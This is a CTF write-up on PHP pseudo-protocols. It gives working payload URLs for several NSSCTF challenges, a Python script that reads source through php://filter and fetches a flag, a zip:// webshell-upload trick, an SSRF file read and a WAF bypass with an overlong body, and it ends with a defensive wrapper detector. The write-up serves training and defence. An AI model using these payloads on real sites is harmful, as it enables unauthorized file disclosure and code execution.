Web Basics: PHP Pseudo-Protocols

Background

The zip pseudo-protocol

Create a new zip archive that contains the PHP one-line webshell 1.php, rename the archive to xxxx.png, and upload it:

?fp=zip://uploads/xxxx.png%231

Here %23 is the URL-encoded # character, and the 1 after it is completed to 1.php.

Challenges

[SWPUCTF 2021 Freshman Competition]PseudoProtocols

How to read hint.php:

?wllm=php://filter/read=convert.base64-encode/resource=hint.php

Pass the value so that it is read as a file:

?a=data://text/plain,I want flag

exp:

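import base64

import requests

# Read hint.php through php://filter so its source comes back Base64-encoded
response1 = requests.get('http://node4.anna.nssctf.cn:28518/index.php?wllm=php://filter/read=convert.base64-encode/resource=hint.php')
# The last 56 characters of the response are the Base64 data; decode them
tmp1 = response1.text[-56:]
tmp2 = base64.b64decode(tmp1.encode())
# print(tmp2)

# Supply "I want flag" through data:// so that it is read as a file
response2 = requests.get('http://node4.anna.nssctf.cn:28518/test2222222222222.php?a=data://text/plain,I want flag')
# Print the last 44 characters of the response (the flag)
print(response2.text[-44:])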

[NISACTF 2022]easyssrf

This is SSRF; try requesting:

file:///flag

Request:

file:///fl4g

Request:

http://node5.anna.nssctf.cn:28734/ha1x1ux1u.php

PHP pseudo-protocol:

http://node5.anna.nssctf.cn:28734/ha1x1ux1u.php?file=php://filter/read=convert.base64-encode/resource=/flag

[SWPUCTF 2022 Freshman Competition]ez_ez_php

The code uses include, so try a pseudo-protocol:

http://node5.anna.nssctf.cn:28778/?file=php://filter/read/convert.base64-encode/resource=flag.php

After Base64-decoding the output, request the flag route directly:

http://node5.anna.nssctf.cn:28778/flag

[Pengcheng Cup 2022]Simple Include

Read through a pseudo-protocol in the flag parameter:

flag=php://filter/convert.base64-encode/resource=/var/www/html/flag.php

The response shows that a WAF is in place… so read index.php first to look at the source:

flag=php://filter/convert.base64-encode/resource=index.php

Bypassing the WAF only requires meeting one of two conditions: either the input does not contain flag, or the length exceeds 800.

Build an overlong POST body:

a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag=php://filter/convert.base64-encode/resource=/var/www/html/flag.php

[HNCTF 2022 Week1]Interesting_include

http://node5.anna.nssctf.cn:28790/?filter=php://filter/read=convert.base64-encode/resource=flag.php

[GDOUCTF 2023]Leaked Disguise

When you run into a check like the following, pass the value in via data:plain/text:

if(file_get_contents($cxk)=="ctrl"){...}

payload:

http://node5.anna.nssctf.cn:28125/orzorz.php?cxk=data:plain/text,ctrl

Another approach that works:

GET:
?cxk=php://input
POST:
ctrl

[MoeCTF 2022]baby_file

http://node5.anna.nssctf.cn:28990/?file=php://filter/convert.base64-encode/resource=flag.php
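
For the defending side, the wrappers used in the payloads above (zip://, php://filter, php://input, data:, file://) can be flagged in request parameters. This is an added example, not part of the original write-up; the function names, the ctf.example host and the sample requests are constructed for illustration, and unlike the WAF described above the scan does not skip a request because of its length.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Stream wrappers that appear in the payloads on this page. "data:" is matched
# without "//" because both data://text/plain,... and data:plain/text,... occur.
WRAPPER_RE = re.compile(r"\s*(php://filter|php://input|zip://|file://|data:)", re.I)
RESOURCE_RE = re.compile(r"resource=(.+)$", re.I)


def inspect_value(value):
    """Return (wrapper, target) if a parameter value starts with a wrapper, else None."""
    m = WRAPPER_RE.match(value)
    if not m:
        return None
    wrapper = m.group(1).lower()
    target = value[m.end():]
    if wrapper == "php://filter":
        # For php://filter the file being read follows "resource=".
        r = RESOURCE_RE.search(value)
        target = r.group(1) if r else ""
    return wrapper, target


def scan_request(url, body=""):
    """Check every query and form-body parameter; the body is checked whatever its length."""
    findings = []
    for source, raw in (("query", urlsplit(url).query), ("body", body)):
        # parse_qsl URL-decodes once, so %23 in a zip:// value becomes "#".
        for name, value in parse_qsl(raw, keep_blank_values=True):
            hit = inspect_value(value)
            if hit:
                findings.append((source, name) + hit)
    return findings


# Constructed sample requests (host and padding length are made up).
LONG_BODY = ("a=" + "a" * 900
             + "&flag=php://filter/convert.base64-encode/resource=/var/www/html/flag.php")
SAMPLES = [
    ("http://ctf.example/?fp=zip://uploads/xxxx.png%231", ""),
    ("http://ctf.example/orzorz.php?cxk=php://input", "ctrl"),
    ("http://ctf.example/", LONG_BODY),
    ("http://ctf.example/index.php?page=about", ""),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, scan_request(url, body))
```

Each finding is a tuple of (source, parameter name, wrapper, target), so the target column shows which file or stream a request tried to reach.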